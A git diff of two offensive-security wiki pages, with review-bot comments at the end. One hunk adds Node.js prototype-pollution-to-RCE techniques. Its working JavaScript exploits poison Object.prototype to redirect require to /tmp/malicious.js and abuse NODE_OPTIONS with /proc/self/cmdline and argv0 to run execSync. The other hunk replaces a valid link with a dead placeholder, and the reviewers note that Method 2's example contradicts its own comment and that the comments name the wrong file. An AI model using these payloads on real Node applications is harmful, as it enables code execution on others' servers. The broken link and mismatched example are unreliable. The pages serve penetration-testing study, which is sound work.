diff --git a/generic-methodologies-and-resources/phishing-methodology/README.md b/generic-methodologies-and-resources/phishing-methodology/README.md index adcf52c5..ae841e73 100644 --- a/generic-methodologies-and-resources/phishing-methodology/README.md +++ b/generic-methodologies-and-resources/phishing-methodology/README.md @@ -87,7 +87,7 @@ In order to make sure that the expired domain that you are going to buy **has al * [https://hunter.io/](https://hunter.io) * [https://anymailfinder.com/](https://anymailfinder.com) -In order to **discover more** valid email addresses or **verify the ones** you have already discovered you can check if you can brute-force them smtp servers of the victim. [Learn how to verify/discover email address here](../../network-services-pentesting/pentesting-smtp/#username-bruteforce-enumeration).\ +In order to **discover more** valid email addresses or **verify the ones** you have already discovered you can check if you can brute-force them smtp servers of the victim. [Learn how to verify/discover email address here](../../phishing-methodology/broken-reference/).\ Moreover, don't forget that if the users use **any web portal to access their mails**, you can check if it's vulnerable to **username brute force**, and exploit the vulnerability if possible. ## Configuring GoPhish diff --git a/pentesting-web/deserialization/nodejs-proto-prototype-pollution/prototype-pollution-to-rce.md b/pentesting-web/deserialization/nodejs-proto-prototype-pollution/prototype-pollution-to-rce.md index 790e1a2a..599a8c72 100644 --- a/pentesting-web/deserialization/nodejs-proto-prototype-pollution/prototype-pollution-to-rce.md +++ b/pentesting-web/deserialization/nodejs-proto-prototype-pollution/prototype-pollution-to-rce.md 
@@ -159,8 +159,118 @@ var proc = fork('a_file.js'); ## Forcing Spawn -In the previous examples you saw how to trigger the gadget a functionality that **calls `spawn`** needs to be **present** (all methods of **`child_process`** used to execute something calls it). In the previous example that was **part of the the code**, but what if the code **isn't** calling it.\ -In this [**other writeup**](https://blog.sonarsource.com/blitzjs-prototype-pollution/) the user can control the file path were a **`require`** will be executed. In that scenario the attacker just needs to **find a `.js` file inside the system** that will **execute an spawn method when imported**. +In the previous examples you saw how to trigger the gadget a functionality that **calls `spawn`** needs to be **present** (all methods of **`child_process`** used to execute something calls it). In the previous example that was **part of the the code**, but what if the code **isn't** calling it. + +### Controlling a require file path + +In this [**other writeup**](https://blog.sonarsource.com/blitzjs-prototype-pollution/) the user can control the file path were a **`require`** will be executed. In that scenario the attacker just needs to **find a `.js` file inside the system** that will **execute an spawn method when imported.**\ +****Some examples of common files calling a spawn function when imported are: + +* /path/to/npm/scripts/changelog.js +* /opt/yarn-v1.22.19/preinstall.js + +### Setting require file path via prototype pollution + +{% hint style="warning" %} +The **previous technique requires** that the **user controls the path of the file** that is going to be **required**. But this is not always true. +{% endhint %} + +However, if the code is going to execute a require after the prototype pollution, even if you **don't control the path** that is going to be require and this **path is relative**, you **can force a different one abusing propotype pollution**. 
So even if the code line is like `require("./a_file.js")` it will **required the package you set**. + +Therefore, if a require is executed after your prototype pollution and no spawn function, this is the attack: + +* Find a **`.js` file inside the system** that when **required** will **execute something using `child_process`** + * If you can upload files to the platform you are attacking you might upload a file like that +* Pollute the paths to **force the require load of the `.js` file** that will execute something with child\_process +* **Pollute the environ/cmdline** to execute arbitrary code when a child\_process execution function is called (see the initial techniques) + +#### Method 1 to set arbitrary require + +{% tabs %} +{% tab title="exploit" %} +{% code overflow="wrap" %} +```javascript +// Create a file called malicious.js in /tmp +// Contents of malicious.js in the other tab + +// Manual Pollution +b = {} +b.__proto__.exports = { ".": "./malicious.js" } +b.__proto__["1"] = "/tmp" + +// Trigger gadget +var proc = require('./relative_path.js'); +// This should execute the file /tmp/malicious.js +// The relative path doesn't even need to exist + + +// Abusing the vulnerable code +USERINPUT = JSON.parse('{"__proto__": {"exports": {".": "./malicious.js"}, "1": "/tmp", "NODE_OPTIONS": "--require /proc/self/cmdline", "argv0": "console.log(require(\\\"child_process\\\").execSync(\\\"touch /tmp/pp2rce2\\\").toString())//"}}') + +clone(USERINPUT); + +var proc = require('./relative_path.js'); +// This should execute the file /tmp/malicious.js wich create the file /tmp/pp2rec +``` +{% endcode %} +{% endtab %} + +{% tab title="malicious.js" %} +```javascript +const { fork } = require('child_process'); +console.log("Hellooo from malicious"); +fork('/path/to/anything'); +``` +{% endtab %} +{% endtabs %} + +#### Method 2 to set arbitrary require + +{% tabs %} +{% tab title="exploit" %} +{% code overflow="wrap" %} +```javascript +// Create a file called malicious.js 
in /tmp +// Contents of malicious.js in the other tab + +// Manual Pollution +b = {} +b.__proto__.data = {} +b.__proto__.data.exports = { ".": "./malicious.js" } +b.__proto__.path = "/tmp" +b.__proto__.name = "./relative_path2.js" //This needs to be the relative path that will be imported in the require + +// Trigger gadget +var proc = require('./relative_path.js'); +// This should execute the file /tmp/malicious.js +// The relative path doesn't even need to exist + + +// Abusing the vulnerable code +USERINPUT = JSON.parse('{"__proto__": {"data": {"exports": {".": "./malicious.js"}}, "path": "/tmp", "name": "./relative_path.js", "NODE_OPTIONS": "--require /proc/self/cmdline", "argv0": "console.log(require(\\\"child_process\\\").execSync(\\\"touch /tmp/pp2rce2\\\").toString())//"}}') + +clone(USERINPUT); + +var proc = require('./relative_path.js'); +// This should execute the file /tmp/malicious.js wich create the file /tmp/pp2rec +``` +{% endcode %} +{% endtab %} + +{% tab title="malicious.js" %} +```javascript +const { fork } = require('child_process'); +console.log("Hellooo from malicious"); +fork('/path/to/anything'); +``` +{% endtab %} +{% endtabs %} + +## References + +* [https://research.securitum.com/prototype-pollution-rce-kibana-cve-2019-7609/](https://research.securitum.com/prototype-pollution-rce-kibana-cve-2019-7609/) +* [https://blog.sonarsource.com/blitzjs-prototype-pollution/](https://blog.sonarsource.com/blitzjs-prototype-pollution/) +* [https://arxiv.org/pdf/2207.11171.pdf](https://arxiv.org/pdf/2207.11171.pdf)
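Review bot: in the phishing README hunk the replacement link `../../phishing-methodology/broken-reference/` is a dead target: relative to `generic-methodologies-and-resources/phishing-methodology/README.md` it resolves to a `phishing-methodology/broken-reference/` directory at the repository root, while the phishing pages live under `generic-methodologies-and-resources/`, and `broken-reference` is the placeholder name a GitBook export emits for a link it could not resolve. The sentence "Learn how to verify/discover email address here" therefore now points nowhere; keep the previous target `../../network-services-pentesting/pentesting-smtp/#username-bruteforce-enumeration`, which is the SMTP user-enumeration section the sentence is about. While the line is being touched, "brute-force them smtp servers" should read "brute-force the SMTP servers".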
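Review bot: in the prototype-pollution-to-rce hunk, Method 2's manual pollution sets `b.__proto__.name = "./relative_path2.js"` with the comment that this must equal the relative path passed to `require`, but the trigger two lines below is `require('./relative_path.js')`, so the manual example does not match its own rule (the `JSON.parse` payload further down correctly uses `"name": "./relative_path.js"`); change the manual value to `"./relative_path.js"`. In both methods the closing comment says the payload creates `/tmp/pp2rec`, while the `argv0` payload runs `touch /tmp/pp2rce2`; make the comment match the command. The gadget itself is undocumented: nothing in the hunk says which Node module-loader lookups read `exports` and index `"1"` (Method 1) or `data.exports`, `path` and `name` (Method 2) from `Object.prototype`, nor which Node version this was tested on, so a reader cannot tell when the technique stops working; one sentence naming the internal lookup being hijacked and the tested version would fix that, and a short caveat that the `NODE_OPTIONS` + `/proc/self/cmdline` + `argv0` trigger assumes Linux. Prose fixes in the added text: "were a require" should be "where a require", "an spawn" should be "a spawn", "propotype" should be "prototype", "it will required the package you set" should be "it will require the file you set", "wich" should be "which", and the stray `****` before "Some examples of common files" is leftover bold markup and should be removed.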